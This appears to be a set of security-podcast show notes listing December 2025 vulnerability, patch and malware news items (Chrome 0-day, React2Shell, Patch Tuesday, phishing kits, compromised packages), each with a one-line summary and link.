Using AI Gemma 3 Locally with a Single CPU
Installing AI models on modes hardware is possible and can be useful to experiment with these models on premise
https://isc.sans.edu/diary/Using%20AI%20Gemma%203%20Locally%20with%20a%20Single%20CPU%20/32556
Mystery Google Chrome 0-Day Vulnerability
Google released an update for Google Chrome fixing a vulnerability that is already being exploited, but has not CVE number assigned to it yet
https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop_10.html
SOAPwn: Pwning NET Framework Applications Through HTTP Client Proxies And WSDL
Watchtwr identified a common vulnerability in SOAP implementations using .Net
https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/

Possible exploit variant for CVE-2024-9042 (Kubernetes OS Command Injection)
We observed HTTP requests with our honeypot that may be indicative of a new version of an exploit against an older vulnerability. Help us figure out what is going on.
https://isc.sans.edu/diary/Possible%20exploit%20variant%20for%20CVE-2024-9042%20%28Kubernetes%20OS%20Command%20Injection%29/32554
React2Shell: Technical Deep-Dive & In-the-Wild Exploitation of CVE-2025-55182
Wiz has a writeup with more background on the React2Shell vulnerability and current attacks
https://www.wiz.io/blog/nextjs-cve-2025-55182-react2shell-deep-dive
Notepad++ Update Hijacking
Notepad++ s vulnerable update process was exploited
https://notepad-plus-plus.org/news/v889-released/
New macOS PackageKit Privilege Escalation
A PoC was released for a new privilege escalation vulnerability in macOS. Currently, there is no patch.
https://khronokernel.com/macos/2024/06/03/CVE-2024-27822.html

Microsoft Patch Tuesday
Microsoft released its regular monthly patch on Tuesday, addressing 57 flaws.
https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20December%202025/32550
Adobe Patches
Adobe patched five products. The remote code execution in ColdFusion, as well as the code execution issue in Acrobat, will very likely see exploits soon.
https://helpx.adobe.com/security.html
Ivanti Endpoint Manager Patches
Ivanti patched four vulnerabilities in End Point Manager.
https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024?language=en_US
Fortinet FortiCloud SSO Vulnerability
Due to a cryptographic vulnerability, Forinet s FortiCloud SSO authentication is bypassable.
https://fortiguard.fortinet.com/psirt/FG-IR-25-647
ruby-saml vulnerability
Ruby fixed a vulnerability in ruby-saml. The issue is due to an incomplete patch for another vulnerability a few months ago.
https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-9v8j-x534-2fx3

nanoKVM Vulnerabilities
The nanoKVM device updates firmware insecurely; however, the microphone that the authors of the advisory referred to as undocumented may actually be documented in the underlying hardware description.
https://www.tomshardware.com/tech-industry/cyber-security/researcher-finds-undocumented-microphone-and-major-security-flaws-in-sipeed-nanokvm
Ghostframe Phishing Kit
The Ghostframe phishing kit uses iFrames and random subdomains to evade detection
https://blog.barracuda.com/2025/12/04/threat-spotlight-ghostframe-phishing-kit
WatchGuard Advisory
WatchGuard released an update for its Firebox appliance, fixing ten vulnerabilities. Five of these are rated as High.
https://www.watchguard.com/wgrd-psirt/advisories

AutoIT3 Compiled Scripts Dropping Shellcodes
Malicious AutoIT3 scripts are usign the FileInstall function to include additional scripts at compile time that are dropped as temporary files during execution.
https://isc.sans.edu/diary/AutoIT3%20Compiled%20Scripts%20Dropping%20Shellcodes/32542
React2Shell Update
The race is on to patch vulnerable systems. Various groups are aggressively scanning the internet with different exploit variants. Some attempt to bypass WAFs.
https://blog.cloudflare.com/5-december-2025-outage/
https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/
Apache Tika XXE Flaw
Apache s Tika library patched a XXE flaw.
https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k

Nation-State Attack or Compromised Government? [Guest Diary]
An IP address associated with the Indonesian Government attacked one of our interns' honeypots.
https://isc.sans.edu/diary/Nation-State%20Attack%20or%20Compromised%20Government%3F%20%5BGuest%20Diary%5D/32536
React Update
Working exploits for the React vulnerability patched yesterday are not widely available
Array Networks Array AG Vulnerablity
A recently patched vulnerability in Array Networks Array AG VPN gateways is actively exploited.
https://www.jpcert.or.jp/at/2025/at250024.html

Attempts to Bypass CDNs
Our honeypots recently started receiving scans that included CDN specific headers.
https://isc.sans.edu/diary/Attempts%20to%20Bypass%20CDNs/32532
React Vulnerability CVE-2025-55182
React patched a critical vulnerability in React server components. Exploitation is likely imminent.
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Unveiling 3 PickleScan Vulnerabilities
The PyTorch AI model security tool, PickleScan, has patched three critical vulnerabilities.
https://jfrog.com/blog/unveiling-3-zero-day-vulnerabilities-in-picklescan/

SmartTube Android App Compromise
The key a developer used to sign the Android YouTube player SmartTube was compromised and used to publish a malicious version.
https://github.com/yuliskov/SmartTube/issues/5131#issue-3670629826
https://github.com/yuliskov/SmartTube/releases/tag/notification
Two Years, 17K Downloads: The NPM Malware That Tried to Gaslight Security Scanners
Over the course of two years, a malicious NPM package was updated to evade detection and has now been identified, in part, due to its attempt to bypass AI scanners through prompt injection.
https://www.koi.ai/blog/two-years-17k-downloads-the-npm-malware-that-tried-to-gaslight-security-scanners
Stored XSS Vulnerability via SVG Animation, SVG URL, and MathML Attributes
Angular fixed a store XSS vulnerability.
https://github.com/angular/angular/security/advisories/GHSA-v4hv-rgfq-gp49

Hunting for SharePoint In-Memory ToolShell Payloads
A walk-through showing how to analyze ToolShell payloads, starting with acquiring packets all the way to decoding embedded PowerShell commands.
https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Hunting%20for%20SharePoint%20In-Memory%20ToolShell%20Payloads/32524
Android Security Bulletin December 2025
Google fixed numerous vulnerabilities with its December Android update. Two of these vulnerabilities are already being exploited.
https://source.android.com/docs/security/bulletin/2025-12-01
4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign
A group or individual released several browser extensions that worked fine for years until an update injected malicious code into the extension
https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign

Fake adult websites pop realistic Windows Update screen to deliver stealers via ClickFix
The latest variant of ClickFix tricks users into copy/pasting commands by displaying a fake blue screen of death.
https://www.acronis.com/en/tru/posts/fake-adult-websites-pop-realistic-windows-update-screen-to-deliver-stealers-via-clickfix/
B2B Guest Access Creates an Unprotected Attack Vector
Users may be tricked into joining an external Teams workspace as a guest, bypassing protections typically enabled for Teams workspaces.
https://www.ontinue.com/resource/blog-microsoft-chat-with-anyone-understanding-phishing-risk/
Geoserver XXE Vulnerability CVE-2025-58360
Geoserver patched an external XML entity (XXE) vulnerability.
https://helixguard.ai/blog/CVE-2025-58360

Spyware Allows Cyber Threat Actors to Target Users of Messaging Applications
Spyware attacks messaging applications in part by triggering vulnerabilities in messaging applications but also by deploying tools like keystroke loggers and screenshot applications.
https://www.cisa.gov/news-events/alerts/2025/11/24/spyware-allows-cyber-threat-actors-target-users-messaging-applications
Stop Putting Your Passwords Into Random Websites Yes. Just Stop!
https://labs.watchtowr.com/stop-putting-your-passwords-into-random-websites-yes-seriously-you-are-the-problem/
Fluentbit Vulnerability
https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover
Happy Thanksgiving. Next podcast on Monday after Thanksgiving.